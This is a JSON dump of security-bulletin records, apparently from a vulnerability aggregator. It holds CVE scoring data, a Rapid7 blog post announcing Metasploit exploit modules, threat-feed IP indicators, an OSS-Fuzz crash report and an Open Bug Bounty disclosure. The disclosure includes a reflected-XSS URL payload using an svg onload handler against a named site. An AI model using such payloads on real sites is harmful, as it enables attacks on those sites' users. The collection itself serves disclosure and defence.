"3af1505bb544dda218d75b85115a5f50"}, {"key": "href", "hash": "8a78638b192845f72b22d59c98bb2c18"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "49d781fb6dfa6ff466644692b38e5931"}, {"key": "published", "hash": "9ae17c199f07ac51e3a7c08a959fd2cf"}, {"key": "references", "hash": "fdcb1292985745cfaefd6741169305e0"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "8f98885b58bf9703800ebe7376998ee8"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "2ca2e6e18a3a068e2ece00f21d314f9052d15335f7b1b794e64fd89e5862a5ca", "viewCount": 12, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-23T00:07:49", "rev": 2}, "score": {"value": 3.5, "vector": "NONE", "modified": "2021-04-23T00:07:49", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:pulsesecure:pulse_one_on-premise:2.0.1649"], "affectedSoftware": [{"cpeName": "pulsesecure:pulse_one_on-premise", "name": "pulsesecure pulse one on-premise", "operator": "eq", "version": "2.0.1649"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": ["cpe:2.3:a:pulsesecure:pulse_one_on-premise:2.0.1649:*:*:*:*:*:*:*"], "cwe": ["CWE-20"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_one_on-premise:2.0.1649:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "http://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40971", "refsource": "CONFIRM", "tags": ["Mitigation", "Patch", "Vendor Advisory"], "url": "http://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40971"}], "immutableFields": []}], "rapid7blog": [{"id": "RAPID7BLOG:764CA6BDCBE5F8F001B5E508AE0659CC", "hash": "40f5ee7b684d378b66e7c2c176708363", "type": "rapid7blog", "bulletinFamily": "info", "title": "Metasploit Wrap-Up", "description": "## Sprinkle on the Modules\n\n\n\n \nThe first quarter of 2021 has given us wave after wave of Exchange vulnerabilities, and while our awesome contributors helped us continue coverage with another Exchange module we were able to add to Metasploit, we also added modules covering very heavy-hitting vulnerabilities in F5, SAP, and SaltStack that may have gotten less notice in the shadow of the Exchange vulnerabilities earlier this quarter. This update offers two new modules from community contributor Vladimir Ivanov targeting remote code execution vulnerabilities in SAP, a new module by our own Will Vu covering a remote code execution vulnerability in F5 Big-IP and BIG-IQ devices that gives root access, and a new module by Metasploit team-member Chrisophe De La Fuente covering a remote code execution in Salt Stack also yielding root access. Then, to top it off, community contributor Erik Wynter contributed a scanner module to identify Nagios XI applications and suggest possible exploit modules that may work on the identified targets!\n\n## Search your Feelings\u2026 and POSIX filesystems!\n\nOur own [space-r7](<https://github.com/space-r7>) added the fs_search function into our Mettle payloads (A.K.A. POSIX Meterpreter). You can now search target filesystems just as you can with the Windows Meterpreter!\n\n## New Modules (6)\n\n * [SAP Solution Manager remote unauthorized OS commands execution](<https://github.com/rapid7/metasploit-framework/pull/14924>) by Dmitry Chastuhin, Pablo Artuso, [Vladimir Ivanov](<https://github.com/Vladimir-Ivanov-Git>), and Yvan Genuer, which exploits [CVE-2020-6207](<https://attackerkb.com/topics/CjM1DUFUOx/cve-2020-6207?referrer=blog>) This PR adds two modules to exploit a vulnerability in the SAP Solution Manager application. Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected within the context of the application.\n * [Nagios XI Scanner](<https://github.com/rapid7/metasploit-framework/pull/14697>) by [Erik Wynter](<https://github.com/kalba-security>), which exploits [CVE-2020-35578](<https://attackerkb.com/topics/ftmpf6wgqi/cve-2020-35578?referrer=blog>) A new set of libraries have been added to support developers wishing to target Nagios XI machines, which should help to supply developers with several commonly used pieces of functionality. Additionally a scanner module has been added which will scan Nagios XI installations and try to detect the version installed. Once the version of Nagios XI has been obtained, it will then suggest exploits in Metasploit that can be used to exploit that version of Nagios XI, if any exploits are available.\n * [F5 iControl REST Unauthenticated SSRF Token Generation RCE](<https://github.com/rapid7/metasploit-framework/pull/14935>) by wvu and Rich Warren, which exploits [CVE-2021-22986](<https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986?referrer=blog>) This adds a module that exploits an unauthenticated SSRF vulnerability in F5's iControl REST API that is then leveraged to execute code as the `root` user on various versions of F5's BIG-IP and BIG-IQ devices.\n * [SaltStack Salt API Unauthenticated RCE through wheel_async client](<https://github.com/rapid7/metasploit-framework/pull/14950>) by Alex Seymour and [Christophe De La Fuente](<https://github.com/cdelafuente-r7>), which exploits [CVE-2021-25282](<https://attackerkb.com/topics/HtY90kt4ZL/cve-2021-25282?referrer=blog>) This adds an exploit module that exploits an authentication bypass and a directory traversal vulnerability in versions `3002.5` and below of SaltStack Salt's REST API. Remote code execution as the `root` user is achieved by writing a custom grain module to the extension module directory and waiting until a recurring maintenance check executes the malicious grain module.\n * [Windows Gather Exchange Server Mailboxes](<https://github.com/rapid7/metasploit-framework/pull/14869>) by [SophosLabs Offensive Security team](<https://github.com/sophosyaniv>). This PR adds a module for enumerating end extracting mailboxes on Exchange servers.\n\n## Enhancements and features\n\n * [#14937](<https://github.com/rapid7/metasploit-framework/pull/14937>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) Improves the performance of the various `show` commands within the console. For instance `show exploits` now takes ~0.5 seconds instead of ~14 seconds\n * [#14945](<https://github.com/rapid7/metasploit-framework/pull/14945>) from [mekhalleh](<https://github.com/mekhalleh>) This updates the ProxyLogon RCE module to use an RPC request to identify the backend server's FQDN.\n * [#14951](<https://github.com/rapid7/metasploit-framework/pull/14951>) from [timwr](<https://github.com/timwr>) This updates the Linux Meterpreter implementation to support the `search` command which allows users to search for files on a compromised system.\n\n## Bugs Fixed\n\n * [#14918](<https://github.com/rapid7/metasploit-framework/pull/14918>) from [zeroSteiner](<https://github.com/zeroSteiner>) Fixes an issue where the `VHOST` option was not being correctly populated when the `RHOST` option was specified with domain names.\n * [#14962](<https://github.com/rapid7/metasploit-framework/pull/14962>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) Updates the `nexpose_connect` login functionality to correctly handle the `@` symbol being present in the password\n * [#14966](<https://github.com/rapid7/metasploit-framework/pull/14966>) from [ryanpohlner](<https://github.com/ryanpohlner>) This improves the ProxyLogon RCE module to address an issue where a payload would be run twice.\n * [#14969](<https://github.com/rapid7/metasploit-framework/pull/14969>) from [timwr](<https://github.com/timwr>) This fixes a bug in the Python Meterpreter's DNS resolving function.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.37...6.0.38](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-03-25T11%3A07%3A15-05%3A00..2021-04-01T08%3A47%3A57-05%3A00%22>)\n * [Full diff 6.0.37...6.0.38](<https://github.com/rapid7/metasploit-framework/compare/6.0.37...6.0.38>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "published": "2021-04-02T19:49:02", "modified": "2021-04-02T19:49:02", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://blog.rapid7.com/2021/04/02/metasploit-wrap-up-105/", "reporter": "Brendan Watters", "references": [], "cvelist": ["CVE-2020-35578", "CVE-2020-6207", "CVE-2021-22986", "CVE-2021-25282"], "lastseen": "2021-04-02T20:50:20", "history": [], "viewCount": 56, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-6207", "CVE-2021-22986", "CVE-2020-35578", "CVE-2021-25282"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-25282"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-25282"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_A1E03A3D7BE011EBB39220CF30E32F6D.NASL", "SAP_SOLUTION_MANAGER_2890213.NASL", "PHOTONOS_PHSA-2021-1_0-0364_SALT3.NASL", "PHOTONOS_PHSA-2021-3_0-0200_SALT3.NASL", "OPENSUSE-2021-347.NASL", "F5_CVE-2021-22986.NBIN", "F5_BIGIP_SOL03009991.NASL", "SUSE_SU-2021-0628-1.NASL", "FEDORA_2021-904A2DBC0C.NASL", "SUSE_SU-2021-0631-1.NASL"]}, {"type": "attackerkb", "idList": ["AKB:245CA8F9-A32E-455B-B7C9-E1CD95710F9D", "AKB:930A50FF-16A2-4EA8-91C8-71360A643E5E"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:3D5A9B1B55D73BE6810D0DB036F8B83F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162058", "PACKETSTORM:162066", "PACKETSTORM:161993", "PACKETSTORM:162059", "PACKETSTORM:160948", "PACKETSTORM:162207"]}, {"type": "exploitdb", "idList": ["EDB-ID:49738", "EDB-ID:49422"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/NAGIOS_XI_PLUGINS_FILENAME_AUTHENTICATED_RCE/", "MSF:EXPLOIT/MULTI/SAP/CVE_2020_6207_SOLMAN_RS/", "MSF:EXPLOIT/LINUX/HTTP/F5_ICONTROL_REST_SSRF_RCE/", "MSF:AUXILIARY/ADMIN/SAP/CVE_2020_6207_SOLMAN_RCE/"]}, {"type": "seebug", "idList": ["SSV:99156"]}, {"type": "thn", "idList": ["THN:4959B86491B72239BCAF1958D167D57D", "THN:D31DB501A57ADE0C1DBD12724D8CA44C", "THN:3C21F3359B50A4527A83BD7E63B731B2", "THN:A7AA3AE7A696436A10F01A7B17DFFA4E"]}, {"type": "cisa", "idList": ["CISA:A55091A825D08BAA55750010D4193771"]}, {"type": "threatpost", "idList": ["THREATPOST:4CFA3A7AC21D83FC03B1B74B2DA261BD", "THREATPOST:BC4ECD6616ADCCFFD5717D0A9A0D065B", "THREATPOST:1D03F5885684829E899CEE4F63F5AC27"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:72759E1136A76135F26DD97485912606", "RAPID7BLOG:BCF35FC32C607E99444655FC5896B1EB", "RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713", "RAPID7BLOG:5469B2F04F34A9BFD78A364ECC4F941F"]}, {"type": "gentoo", "idList": ["GLSA-202103-01"]}, {"type": "fedora", "idList": ["FEDORA:AE7BA3072F0B", "FEDORA:BFFD030BDAB1", "FEDORA:F08FB30BB4E1"]}, {"type": "freebsd", "idList": ["A1E03A3D-7BE0-11EB-B392-20CF30E32F6D"]}, {"type": "archlinux", "idList": ["ASA-202102-33"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0347-1"]}], "modified": "2021-04-02T20:50:20", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-04-02T20:50:20", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.rss.RssBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}], "rst": [{"id": "RST:BC5F7238-7F8C-326B-B36C-30B75F3B8451", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 198.37.101.97", "description": "Found **198[.]37.101.97** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **37**.\n First seen: 2020-12-19T03:00:00, Last seen: 2020-12-30T03:00:00.\n IOC tags: **generic**.\nASN 14935: (First IP 198.37.101.0, Last IP 198.37.101.255).\nASN Name \"MONTICELLO\" and Organisation \"Monticello Networks Inc\".\nASN hosts 2526 domains.\nGEO IP information: City \"Monticello\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-01-05T00:00:00", "modified": "2020-12-19T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2020-12-30T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "5b7d07e24029ee89996d3f91d8eeaabe"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "fb312ac806129e106450335a98863f87"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "d3d77c13c6febe3557784506779872f3"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "29c86cdc9f5b2b2e3a4e68926337f108"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "8b34fb869f6a2f49dae4deab19aa82ba"}, {"key": "modified", "hash": "3e6e7a98a2a5f83bf8f0238ed6d2f016"}, {"key": "published", "hash": "104521a976abf2e41bea083b8f5112f3"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "38eb2af17c7fa175e985d197dec33f3b"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "fdb5da3313c89bc447e7c7a6a6a5437afe4c1b7da95dc7a267528635dc2ea47f", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["198.37.101.97"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.83, "ioc_src": 56.12, "ioc_tags": 0.8, "ioc_total": 37.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Monticello", "country": "United States", "region": "Iowa"}, "asn": {"cloud": "", "domains": 2526, "firstip": {"netv4": "198.37.101.0", "num": "3324339456"}, "isp": "MONTICELLO", "lastip": {"netv4": "198.37.101.255", "num": "3324339711"}, "num": 14935, "org": "Monticello Networks Inc"}, "threat": []}, {"id": "RST:DCF3EEC6-BEF8-367D-9317-3100E572ADFB", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 199.83.210.191", "description": "Found **199[.]83.210.191** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **43**.\n First seen: 2020-12-15T03:00:00, Last seen: 2020-12-16T03:00:00.\n IOC tags: **generic**.\nASN 14935: (First IP 199.83.208.0, Last IP 199.83.215.255).\nASN Name \"MONTICELLO\" and Organisation \"Monticello Networks Inc\".\nASN hosts 2480 domains.\nGEO IP information: City \"\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2020-12-17T00:00:00", "modified": "2020-12-15T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2020-12-16T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "5f4aaa7ce617481547eff967dede9fd5"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "630d1efa0dcdf307b764faffbe604042"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "e1f48e147806d10e6da0f0d316330810"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "7154b244622af5afea2bd48b35464747"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "738478a84ec8315277acc532275f0596"}, {"key": "modified", "hash": "30b1ad9cb802d689bb0f8bc2b2a1beb5"}, {"key": "published", "hash": "0fcca158d515ce20d2f103aa23400629"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "f99c7057f122d680fc7556960453f524"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "795f2d5010785c71d37c042ae4a5e18f6840ecbc9fd1e982509203181e9ad2d2", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["199.83.210.191"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.98, "ioc_src": 56.12, "ioc_tags": 0.8, "ioc_total": 43.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "United States", "region": ""}, "asn": {"cloud": "", "domains": 2480, "firstip": {"netv4": "199.83.208.0", "num": "3344158720"}, "isp": "MONTICELLO", "lastip": {"netv4": "199.83.215.255", "num": "3344160767"}, "num": 14935, "org": "Monticello Networks Inc"}, "threat": []}, {"id": "RST:B3D876AC-D4FD-3EE8-A751-91223945C71E", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 192.154.201.98", "description": "Found **192[.]154.201.98** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **51**.\n First seen: 2020-09-06T03:00:00, Last seen: 2020-09-06T03:00:00.\n IOC tags: **generic**.\nASN 14935: (First IP 192.154.201.0, Last IP 192.154.201.255).\nASN Name \"MONTICELLO\" and Organisation \"Monticello Networks Inc\".\nASN hosts 2336 domains.\nGEO IP information: City \"Cleveland\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2020-09-06T00:00:00", "modified": "2020-09-06T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2020-09-06T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "b40e306a30e6e1ad964d0845aa08b88c"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "ff7664c339d65c4602e1efcfc709577a"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "fe286be4d072c5ff4e23a2bc6febc4c9"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "b7dbe50ce058f9cb1b4c8659ed3d4b46"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "30ca1f185384c9c357e01044505108c6"}, {"key": "modified", "hash": "8b9d824e654713d897d59957e2bfd19e"}, {"key": "published", "hash": "8b9d824e654713d897d59957e2bfd19e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "title", "hash": "4c1dcc7b2c9b0e88a22da56dc8367951"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "8ae0b4ffd877cee94957bf53d4e0522eb8012f169dbed05b79574f1b89686af3", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["192.154.201.98"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 1, "ioc_src": 64.84, "ioc_tags": 0.8, "ioc_total": 51}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Cleveland", "country": "United States", "region": "Ohio"}, "asn": {"cloud": "", "domains": 2336, "firstip": {"netv4": "192.154.201.0", "num": "3231369472"}, "isp": "MONTICELLO", "lastip": {"netv4": "192.154.201.255", "num": "3231369727"}, "num": 14935, "org": "Monticello Networks Inc"}}], "ossfuzz": [{"id": "OSSFUZZ-14935", "hash": "b0377d5ce7dddb400c3887d07f068790", "type": "ossfuzz", "bulletinFamily": "software", "title": "libspng/spng_read_fuzzer_structure_aware: Crash in validate_past_idat", "description": "Project:\nhttps://gitlab.com/randy408/libspng.git\nhttps://github.com/randy408/libspng.git\n\nDetailed report: https://oss-fuzz.com/testcase?key=5162723165339648\n\nProject: libspng\nFuzzer: libFuzzer_libspng_spng_read_fuzzer_structure_aware\nFuzz target binary: spng_read_fuzzer_structure_aware\nJob Type: libfuzzer_asan_libspng\nPlatform Id: linux\n\nCrash Type: UNKNOWN READ\nCrash Address: 0x01fed7ec0924\nCrash State:\n validate_past_idat\n spng_decode_image\n spng_read_fuzzer.cc\n \nSanitizer: address (ASAN)\n\nRecommended Security Severity: Medium\n\nRegressed: https://oss-fuzz.com/revisions?job=libfuzzer_asan_libspng&range=201905220154:201905242051\n\nReproducer Testcase: https://oss-fuzz.com/download?testcase_id=5162723165339648\n\nIssue filed automatically.\n\nSee https://github.com/google/oss-fuzz/blob/master/docs/reproducing.md for instructions to reproduce this bug locally.\n\nThis bug is subject to a 90 day disclosure deadline. If 90 days elapse\nwithout an upstream patch, then the bug report will automatically\nbecome visible to the public.\n\nWhen you fix this bug, please\n * mention the fix revision(s).\n * state whether the bug was a short-lived regression or an old bug in any stable releases.\n * add any other useful information.\nThis information can help downstream consumers.\n\nIf you need to contact the OSS-Fuzz team with a question, concern, or any other feedback, please file an issue at https://github.com/google/oss-fuzz/issues.", "published": "2019-05-25T01:18:18", "modified": "2019-08-17T15:27:13", "cvss": {}, "href": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=14935", "reporter": "Google", "references": [], "cvelist": [], "lastseen": "2020-04-03T20:57:45", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [], "modified": "2020-04-03T20:57:45", "rev": 2}, "score": {"value": -0.6, "vector": "NONE", "modified": "2020-04-03T20:57:45", "rev": 2}}, "objectVersion": "1.4", "ossfuzz": {"issue": 14935, "status": "Verified", "project": "libspng", "ref": "https://oss-fuzz.com/revisions?job=libfuzzer_asan_libspng&range=201907170316:201907180307", "crashType": "UNKNOWN READ", "revisions": ["cb18f38c1f2c62a70062d5d2d36b28e7384b954d:6ca0409f3cc8c1d23b8c36834db39c05c1db281a"], "project_repos": ["https://gitlab.com/randy408/libspng.git", "https://github.com/randy408/libspng.git"], "tags": ["0.5.0", "0.4.5", "0.4.4", "0.4.3", "0.4.2", "0.4.1", "0.4.0", "0.3.1", "0.3.0", "0.2.0"]}, "affectedSoftware": [{"name": "libspng", "version": "0.4.5", "operator": "eq"}, {"name": "libspng", "version": "0.4.4", "operator": "eq"}, {"name": "libspng", "version": "0.4.3", "operator": "eq"}, {"name": "libspng", "version": "0.4.2", "operator": "eq"}, {"name": "libspng", "version": "0.4.1", "operator": "eq"}, {"name": "libspng", "version": "0.4.0", "operator": "eq"}, {"name": "libspng", "version": "0.3.1", "operator": "eq"}, {"name": "libspng", "version": "0.3.0", "operator": "eq"}, {"name": "libspng", "version": "0.2.0", "operator": "eq"}], "_object_type": "robots.models.ossfuzz.OssFuzzBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.ossfuzz.OssFuzzBulletin"]}], "openbugbounty": [{"type": "openbugbounty", "lastseen": "2017-10-17T06:04:11", "_object_types": ["robots.models.openbugbounty.OpenbugbountyBulletin", "robots.models.base.Bulletin"], "href": "https://www.openbugbounty.org/reports/141575/", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "reporter": "Spam404", "description": "##### Vulnerable URL:\n \n \n http://www.alinea.fr/?search=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| Yes, at 20.02.2017 \nLatest check for patch:| 20.02.2017 10:10 GMT \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| 14935 \nGoogle Pagerank| 5 \nVIP website status:| Yes \nCheck alinea.fr SSL connection:| (Grade: B-) \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 15 March, 2016 04:03 GMT \nGeneric security notifications sent to website owner| 15 March, 2016 04:05 GMT \nVulnerability details disclosed by researcher| 7 June, 2016 04:11 GMT \nVulnerability patched by the website owner| 20 February, 2017 23:26 GMT\n", "bulletinFamily": "bugbounty", "references": [], "objectVersion": "1.4", "viewCount": 2, "_object_type": "robots.models.openbugbounty.OpenbugbountyBulletin", "cvelist": [], "openbugbounty": {"mirror": "", "patchStatus": "patched"}, "enchantments_done": [], "title": "alinea.fr XSS vulnerability ", "id": "OBB:141575", "modified": "2017-02-20T23:26:00", "published": "2016-03-15T04:03:00", "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2017-10-17T06:04:11", "rev": 2}, "dependencies": {"references": [], "modified": "2017-10-17T06:04:11", "rev": 2}}}]}